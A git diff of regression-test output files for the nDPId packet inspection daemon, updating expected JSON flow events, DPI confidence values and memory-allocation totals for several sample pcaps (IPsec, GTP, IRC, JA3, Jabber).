+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":7664,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763512822,"flow_last_seen":946763512882,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1108,"flow_tot_l4_payload_len":6692,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":2206,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1156,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":2206,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00577{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":1080,"packets-processed":1080,"total-skipped-flows":0,"total-l4-payload-len":535322,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":36,"total-detection-updates":0,"total-updates":12,"current-active-flows":0,"total-active-flows":36,"total-idle-flows":36,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":241,"global_ts_msec":946763527783} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1080/1080 @@ -247,9 +247,9 @@ ~~ total active/idle flows...: 36/36 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5937919 bytes -~~ total memory freed........: 5937919 bytes -~~ total allocations/frees...: 119336/119336 +~~ total memory allocated....: 6071553 bytes +~~ total memory freed........: 6071553 bytes +~~ total allocations/frees...: 122098/122098 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 1561 chars 
diff --git a/test/results/ipv6_in_gtp.pcap.out b/test/results/ipv6_in_gtp.pcap.out index f4fb539e5..318ea22f2 100644 --- a/test/results/ipv6_in_gtp.pcap.out +++ b/test/results/ipv6_in_gtp.pcap.out @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 193 chars ~~ json string max len.......: 558 chars diff --git a/test/results/irc.pcap.out b/test/results/irc.pcap.out index e03b3af39..b387ef3fa 100644 --- a/test/results/irc.pcap.out +++ b/test/results/irc.pcap.out 
@@ -4,8 +4,8 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387554241634,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241634,"pkt":"AAAMB6wBABNyxPHhCABFAAA8\/+BAAEAGJjUKtJz5JuVGFLNhH0BpMfDFAAAAAKACOQj\/0AAAAgQFtAQCCAq+wg8lAAAAAAEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387554241665,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241665,"pkt":"ABNyxPHhANAr0XYACABFAAA8AABAADIGNBYm5UYUCrSc+R9As2GRFS01aTHwxqASFqAOiAAAAgQFtAQCCAowSCUOvsIPJQEDAwY="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387554241665,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387554241665,"pkt":"AAAMB6wBABNyxPHhCABFAAA0\/+FAAEAGJjwKtJz5JuVGFLNhH0BpMfDGkRUtNoAQAHNTYQAAAQEICr7CD0QwSCUO"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1387554241634,"flow_last_seen":1387554241695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387554241695,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} -00909{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1387554241634,"flow_last_seen":1387554256201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1387554256201,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1387554241634,"flow_last_seen":1387554241695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387554241695,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} +00909{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1387554241634,"flow_last_seen":1387554256201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1387554256201,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","packets-captured":29,"packets-processed":29,"total-skipped-flows":0,"total-l4-payload-len":7015,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1387554256201} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 29/29 
@@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872347 bytes -~~ total memory freed........: 5872347 bytes -~~ total allocations/frees...: 118145/118145 +~~ total memory allocated....: 6006012 bytes +~~ total memory freed........: 6006012 bytes +~~ total allocations/frees...: 120907/120907 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 914 chars diff --git a/test/results/ja3_lots_of_cipher_suites.pcap.out b/test/results/ja3_lots_of_cipher_suites.pcap.out index 68a9a9789..6c1a9afdb 100644 --- a/test/results/ja3_lots_of_cipher_suites.pcap.out +++ b/test/results/ja3_lots_of_cipher_suites.pcap.out @@ -31,9 +31,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 207 chars ~~ json string max len.......: 2328 chars diff --git a/test/results/ja3_lots_of_cipher_suites_2_anon.pcap.out b/test/results/ja3_lots_of_cipher_suites_2_anon.pcap.out index 15aca2cfc..c72f553b1 100644 --- a/test/results/ja3_lots_of_cipher_suites_2_anon.pcap.out +++ b/test/results/ja3_lots_of_cipher_suites_2_anon.pcap.out 
@@ -4,7 +4,7 @@ 00437{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":114,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABkI90AAEARjIOEvvQMl3m5LAhoCGgAUAAAMv8AQAE8W3RuUAAARQAAPGNKQABABin+wKiTsZd5waDkgAG7Qsba5QAAAACgAjkIo+MAAAIEBbQEAggKAAu5rwAAAAABAwMF"} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505724520744,"flow_last_seen":1505724520744,"flow_idle_time":200000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1505724520744,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1505724520744,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":80,"thread_ts_msec":1505724520744,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABkI90AAEARjIOEvvQMl3m5LAhoCGgAUAAAMv8AQAE8W3RuUAAARQAAPGNKQABABin+wKiTsZd5waDkgAG7Qsba5QAAAACgAjkIo+MAAAIEBbQEAggKAAu5rwAAAAABAwMF"} 
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505724520744,"flow_last_seen":1505724520744,"flow_idle_time":200000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1505724520744,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505724520744,"flow_last_seen":1505724520744,"flow_idle_time":200000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1505724520744,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1505724520947,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1505724520947,"pkt":"MNF+EIYg\/Ejv6KgaCABFAABgHZ4AAD0Rln6XebkshL70DAhoCGgATAAAMP8APEGxP1xFAAA8AABAADIGm0iXecGgwKiTsQG75IBV2gFiQsba5qAScSDmyQAAAgQFeAQCCAoxbvx\/AAu5rwEDAwc="} 00255{"error_event_id":15,"error_event_name":"Captured packet size is smaller than 
expected packet size","datalink":1,"packet_id":3,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724521281} 00441{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724520947,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABcNCoAAEARfD6EvvQMl3m5LAhoCGgASAAAMv8AOAE8W3RxUAAARQAANGNLQABABioFwKiTsZd5waDkgAG7Qsba5lXaAWOAEAHJhFMAAAEBCAoAC7oNMW78fw=="} 
@@ -31,7 +31,7 @@ 01923{"packet_event_id":1,"packet_event_name":"packet","packet_id":24,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1202,"pkt_l4_len":0,"thread_ts_msec":1505724526302,"pkt":"\/Ejvopo\/MNF+D2w+CABFuASk0zUAAEAR2OqEvvQMl3m5LAhoCGgEkAAAMv8EgAE8W3SEUAAARQAEfGNVQABABiWzwKiTsZd5waDkgAG7Qsbeu1XaCIaAGAIjjQIAAAEBCAoAC7viMW8PEhcDAwRDAAAAAAAAAAFJqZsr2XFOAWwXDu0+7Y9vPaXF6QBuCgzG25Q\/KbgqYu88jDq040h3tvc+aLu+DTcTspkgI5XvLXRFxqBxdvTufQDpaiPCYyECwSJhep14pGbJr74Zfc\/j6Av4+JPM7XoLFlKyk030dBFrQrGR3OC0pR3zpNnKaUQjB+tTd4nLUXzWv2mjrWj7pce\/bPzpfedXtz8tcxLvi8SEHscHZsArZDwdeUf5QLLvVFDZNU4ZEQaimEyX15KzM6G5ToQIrvIFXEhAF3dG5oXfA+Ae4WLPSnyb5NwMMF4kDDNIe1ZVjNBxSABFaYjPPiJg0gQg\/+QEqg1CX23cpDZyJxz7smWB9h7xs7H9AygfzY9wASIaEq6DqGATMfMsN3dYWATzH3hum27SvUyhZ75L0k5HqqsoGIfu+LYC1hNDONFV6+lkufq4BpitkoCYAzdbmomEw05OzNlTrWr0XPFYwgNz7thDeUGqO\/xKaUFeEC4Y7Xy1Gc41hkWo54xuUrmAxO9X1\/+gkn+c3MHGrRESux79pmus577Y7Fo4U\/4oJ6luI0bGV303za2qj4yCdXLeQWjtrOGdBBkw\/wBHF5IbYMOF9bJFx68HeOrrn4nYFgmVhrWXDxyY1xWgLDIjRY5UDtLoQjMcM03rPMf1Z8L76UZ2YHFgGbBPU1OGctMjFUx+R73JxaqxVRw4ymshyrqvP9+E3HE7UquBR2x9EQISSgDorx56T92cLWOMHjn+ek1JnoCiwSF6nQ5wDmyw72RptvWz6AU0FUnuqURBs\/Yt3PJfdurGsJxYBs+wDZGPNy41Qf5bJwUyIKMkYqmgYULqkbNWOZxFV99s4+BV262g1PDKETuLCv2a\/bmZ\/xolpL0HSIF0vX2xBElZHZ+hd84KVa1Y1XFdDw8mr7TyDNVUiL3tNunlmrQfdQETgjFhKIaQn6XGF8V1kH05Pfc52o2vbYUaSnIDJWt30SPlvtzw5ruQY4AYjS9\/zvW4ADabvEgwiTZjb2txs6oHyKnVCekE0WjVDCEceBK1aQn6rKOOPXvKdj3iDTl1Ep2O3m+u3pqEIGzMPxhnKMpUTUMR5vH5kQ6XVO3\/\/O3Fv4Gs+QXjMNEsaI4CKiHU5k1Q0MbXxbrvkqD7nzLmoRz\/kTcbg2\/gjB1KRUMXAi27pqag38iFL5LdNl02Bk8czI\/JMSOpzjzmaW1x5HQLihorbExEU6gi6LG\/RLyN0wdxLAEVfUuvGwMzSO969\/mxBBfNydqDsDV4YQiFLRSJTGt9vGEn+QmnSkfZdl3aM1n9v1oUbRwSanCl2G5YkrCo8NVoEuKsjRybURkxyp7cEy1T38EAeIr7HE3lwdlheQG63MqfDiIz7ld4f9Q0nYgQa1Und43tDU8iH72YEZe9PfwwG1sJOBUaECdibU9+goippYdBUnHF+Q41lhVnISz+74wOY0LMuM8="} 
00256{"error_event_id":15,"error_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":25,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724526501} 00442{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724526501,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABc0zYAAEAR3TGEvvQMl3m5LAhoCGgASAAAMv8AOAE8W3SFUAAARQAANGNWQABABin6wKiTsZd5waDkgAG7QsbjA1XaCIaAEQIjYE4AAAEBCAoAC7vkMW8PEg=="} -00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1505724520744,"flow_last_seen":1505724526702,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5832,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1505724526702,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} 
+00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1505724520744,"flow_last_seen":1505724526702,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5832,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1505724526702,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} 00581{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","packets-captured":27,"packets-processed":27,"total-skipped-flows":0,"total-l4-payload-len":5832,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1505724526702} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 27/27 @@ -41,9 +41,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870226 bytes -~~ total memory freed........: 5870226 bytes -~~ total allocations/frees...: 118141/118141 +~~ total memory allocated....: 6003860 bytes +~~ total memory freed........: 6003860 bytes +~~ total allocations/frees...: 120903/120903 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 260 chars ~~ json string max len.......: 1928 chars 
diff --git a/test/results/jabber.pcap.out b/test/results/jabber.pcap.out
index 04c8d00ff..a0e8a36c6 100644
--- a/test/results/jabber.pcap.out
+++ b/test/results/jabber.pcap.out
@@ -1,24 +1,98 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"jabber.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} -00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1504181789350} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1504181789350,"flow_last_seen":1504181789350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1504181789350,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
